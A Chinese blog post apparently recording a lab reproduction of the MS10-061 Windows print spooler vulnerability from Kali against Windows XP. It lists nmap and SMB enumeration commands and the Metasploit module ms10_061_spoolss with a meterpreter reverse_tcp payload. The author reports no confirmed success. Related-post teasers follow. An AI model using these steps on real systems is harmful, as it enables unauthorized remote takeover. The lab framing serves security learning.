CVE-2010-2729(MS10-061)

最新推荐文章于 2024-04-29 16:33:33 发布
最新推荐文章于 2024-04-29 16:33:33 发布
阅读量1.6k 收藏 3
点赞数 1
分类专栏: 内网渗透 Windows 渗透测试 文章标签: 内网渗透 域安全 红队 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ping_Pig/article/details/109218430
版权
内网渗透 同时被 3 个专栏收录
34 篇文章 12 订阅
订阅专栏
Windows
32 篇文章 10 订阅
订阅专栏
渗透测试
5 篇文章 1 订阅
订阅专栏

目录

讲在前面

实验环境

实验步骤

一、开启WinXP上打印机共享服务

二、kali攻击

讲在前面

此漏洞中文称为:打印后台程序服务模拟漏洞。目前所有的研究文章总结的漏洞成因为:Windows打印后台程序没有充分的限制访问该服务的问题,攻击者可以对其发起恶意请求间接的在Windows系统目录(%SystemRoot%\System32)中创建文件。该漏洞首次被发现并被利用于著名的Stuxnet蠕虫(俗称“震网”)

实验环境

  • WinXP
  • Kali

实验步骤

一、开启WinXP上打印机共享服务

打开控制面板,找到“打印机和传真”,双击打开后,右键选择“添加打印机”。如下地方的配置请注意

 

 

二、kali攻击

1、nmap扫描靶机是否正常开启NetBios和RPC服务

nmap -sS -sU -O -p137-139,445, 192.168.1.122

2、查看netbios名称

nmblookup -A 192.168.1.122

3、查看共享SMB共享资源

smbclient -L \\NetBIOS工作站名字 -I 靶机IP -N

或者在主机上执行net share命令

设置参数并攻击

exploit/windows/smb/ms10_061_spoolss


Payload:windows/meterpreter/reverse_tcp

总结:

笔者这里并未验证成功,并且在win7上也未能利用成功该漏洞,按照微软官方预警,是影响XP\2003\2008\win7的

影响范围

目前未看到有国内研究员的详细研究文章,此处贴出本文借鉴的实验文章

ms10-061复现

Ping_Pig
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Kali利用msf对MS10_061漏洞进行渗透测试
venu_s的博客
12-27 7016
注意事项: kail首次打开metasploit,会初始化数据,可能会有点慢,请耐心等待! 本文仅供学习漏洞渗透测试,不得用于其他非法用途,否则造成的任何后果自负!!! 1. Metasploit简介 Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码...
ms10-061打印后台程序服务远程代码执行漏洞 成功复现xp&win7
田一柠的博客
12-15 1882
漏洞介绍 Windows打印后台程序没有充分限制访问该服务的用户权限,攻击者可以通过提交特制的打印请求在windows系统目录(%SystemRoot%\system32)中创建文件。 攻击者可指定任意文件名,包括目录遍历,通过发送WritePrinter请求,攻击者可以完全控制创建文件的内容。 将文件写入到windows系统目录后,通过WMI来部署恶意程序,因为系统会自动运行%SYstemRoot%\System32\Wbem\MOF文件夹的mof文件、执行命令。 该漏洞首次被发现并应用于著名的S
Metasploit:MS10-061:入侵、提权和取证
YJ_12340的博客
04-29 972
Metasploit Framework是一个开源渗透工具,Metasploit渗透测试框架拥有世界上最大的公共测试漏洞数据库。简单来说,Metasploit可以用来检测安全漏洞,另一方面它也可以用来进行入侵。安全事件响应和取证工具利用MSF中的攻击模块:ms10_061_spoolssWindows打印后台程序没有充分的限制访问该服务的用户权限,攻击者可以通过提交特制的打印请求在Windows系统目录(%SystemRoot%\system32)中创建文件。
【kali】25 漏洞扫描——nmap、smb-vuln-ms10-061.nse(枚举共享打印机)
(∪.∪ )...zzz的博客
10-22 2311
这里写自定义目录标题一、查看脚本,注意categories二、vuln三、smb-vuln-ms10-061.nse查看脚本查看网络中存活的主机使用脚本扫描目标系统的共享打印机 nmap扫描脚本:500+,不同类别 apt-get install ibus ibus-pinyin #安装中文输入法 一、查看脚本,注意categories cat /usr/share/nmap/scripts/script.db categories里说明了脚本的类型 exploit:漏洞利用 二、vuln c
win2008系统漏洞扫描所得的几个漏洞详解
weixin_46709219的博客
11-25 4676
https://blog.csdn.net/weixin_44756468/article/details/107701748 1)https://blog.csdn.net/weixin_43460822/article/details/96423613?utm_medium=distribute.pc_aggpage_search_result.none-task-blog-2allsobaiduend~default-1-96423613.nonecase&utm_term=nmap%20%E
IIS "IP and domain restrictions" 绕过漏洞(CVE-2014-4078)
02-09
Microsoft --------- Microsoft已经为此发布了一个安全公告(MS14-076)以及相应补丁: MS14-076:Vulnerability in Internet Information Services (IIS) Could Allow Security Feature Bypass (2982998) 链接:...
CVE-2017-0100:CVE-2017-0100,MS17-012,Eop
03-25
【标题】:CVE-2017-0100,MS17-012,EOP:深入解析安全漏洞与利用技术 【正文】: CVE-2017-0100,这是一个在2017年被发现的安全漏洞,其全称为“Common Vulnerabilities and Exposures - 2017-0100”。这个漏洞...
MS14-058 CVE-2014-4113
10-21
【MS14-058 CVE-2014-4113】是一个重要的安全更新,主要针对Microsoft Office套件中的一个严重漏洞。这个漏洞编号为CVE-2014-4113,其影响了多个版本的Microsoft Office,包括Word、Excel和PowerPoint等应用程序。该...
CVE-2020-1350:HoneyPoC
03-18
MS链接: : Microsoft已发布安全补丁,您可以在此处下载该补丁: Windows二进制PoC ./CVE-2020-1350.exe will run the exploit. 有关如何使用二进制文件的更多信息,请查看README.pdf。 源代码可在此处获取: : ...
MS12-020(CVE-2012-0002) Exploit 3389远程溢出漏洞代码
03-09
MS12-020(CVE-2012-0002) Exploit 3389远程溢出漏洞代码
网站渗透这块水太深,你把握不住!但你叔我能(十年经验分享)
MachineGunJoe666
05-25 1万+
​​很多朋友问我,想搞网络安全,编程重要吗,选什么语言呢? 国内其实正经开设网络安全专业的学校很少,大部分同学是来自计算机科学、网络工程、软件工程专业的,甚至很多非计算机专业自学的。因此不像这三个专业,有系统的课程体系,大一教什么,大二教什么,大三又教什么,那么清晰明白,网络安全这条路很多都是自学摸索。 我从大二开始入坑网络安全,至今也有十个年头了,也见过许许多多自学成才的例子,工作这些年,先后学习过C、C++、Java、Python、Objective-C、JavaScript、T...
复现nuclei——CVE-2019-2729(Weblogic反序列化远程代码执行漏洞)
记录并分享学习安全的知识点..
01-20 2329
一、漏洞介绍 该漏洞是由wls9-async组件导致,在反序列化处理输入信息时存在缺陷,攻击者可以在/_async/AsyncResponseService路径下传入恶意的XML格式的数据,传入的数据在服务器端反序列化时,执行其中的恶意代码,实现远程命令执行,进而攻击者可以获得整台服务器的权限。 二、影响版本 WebLogic 10.X WebLogic 12.1.3 三、漏洞检测方法 法一:访问http://youip:7001/_async/(返回403说明存在,返回404说明不存在)
2018-2019-2 《网络对抗技术》Exp5 MSF基础应用 Week7-8 20165233
ahgq78625的博客
04-15 251
Exp5 MSF基础应用 目录 一、基础问题 二、攻击实例 主动攻击 ms08_067_netapi(成功) ms10_061_spoolss(失败) 针对浏览器的攻击 ms14_064_ole_code_execution(成功) ms16_051_vbscript(失败) 攻击客户端的实践 adobe_toolbutton(成功) ms10_087_rtf_pfragm...
Weblogic反序列化漏洞(CVE-2019-2729
weixin_41182861的博客
09-25 3983
漏洞简述 CVE-2019-2729漏洞是由于应用在处理反序列化输入信息时存在缺陷,攻击者可以通过发送精心构造的恶意 HTTP 请求,用于获得目标服务器的权限,并在未授权的情况下执行远程命令,最终获取服务器的权限。与CVE-2019-2725漏洞类似。 漏洞编号:CVE-2019-2725 影响版本:10.3.6.0、12.1.3.0、12.2.1.3 测试环境:Linux || vulhub || Weblogic 10.3.6.0 复现开始 PoC攻击脚本: https://git
CVE-2013-2729 Adobe Reader和Acrobat 数字错误漏洞
weixin_30336061的博客
08-14 205
  这个洞是在论坛里看到的,感觉很有意思,来学习一下。个人感觉IE或者说是浏览器的洞和Adobe洞都是比较难调的,主要是有大量的类难以摸清之间的关系。   这个洞是一个整数溢出的洞,这个不是重点。重点是利用的思路,利用思路是挖坑法,即所谓的make hole,通过挖坑来泄漏dll的基址,然后再加以利用。make hole并不是独门绝技,这种方法在IE和Adobe的漏洞利用中都有出现(主要是因为可...
针对MS08-067漏洞的复现
领悟。。。的博客
01-21 1537
本人只是热爱web安全的一名小白,文章只是为了技术提升而分享!大牛勿喷! 本文所使用到的环境工具: 1、win XP SP3 英文版  下载地址:http://pan.baidu.com/s/1qYjNWBi 解压直接用虚拟机打开就能使用开机密码123456 2、Metasplot (我使用的是基于pentest Box里面集成的MSF)
CVE-2018-8174漏洞两种姿势的复现
qq_39627497的博客
12-06 1万+
CVE-2018-8174漏洞两种姿势的复现 CVE-2018-8174漏洞两种姿势的复现 漏洞介绍: 该漏洞影响最新版本的IE浏览器及使用了IE内核的应用程序。用户在浏览网页或打开Office文档时都可能中招,最终被黑客植入后门木马完全控制电脑。微软在4月20日早上确认此漏洞,并于5月8号发布了官方安全补丁,对该0day漏洞进行了修复,并将其命名为CVE-2018-8174。 复现过程1: 1、...
2021-08-26 网安实验-Windows系统渗透测试之EternalBlue漏洞利用复现
热门推荐
时光隧道
08-26 5万+
Metasploit :是一款开源的安全漏洞检测工具。 fb工具目录:Shadow Brokers 公布的NSA方程式组织黑客工具包Windows部分工具,里面包含了IIS6.0、445端口、3389端口、Rootkit等远程利用工具。 主要工具简介: EternalBlue(永恒之蓝) : SMBv1 漏洞攻击工具,影响所有Windows平台,还在支持期的系统打上MS17-010 可以免疫,不再支持期的系统,可以禁用SMBv1(配置注册表或组策略,需要重启) EmeraldThread(翡翠纤维)
CVE-2020-14315
最新发布
07-10
CVE-2020-14315是一个安全漏洞标识符,它通常关联于Microsoft Windows系统的一个远程执行漏洞。这个漏洞被称为"Windows Server 2016及更早版本MS17-010 EternalBlue漏洞",也称为WannaCry勒索软件攻击的一部分。该...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值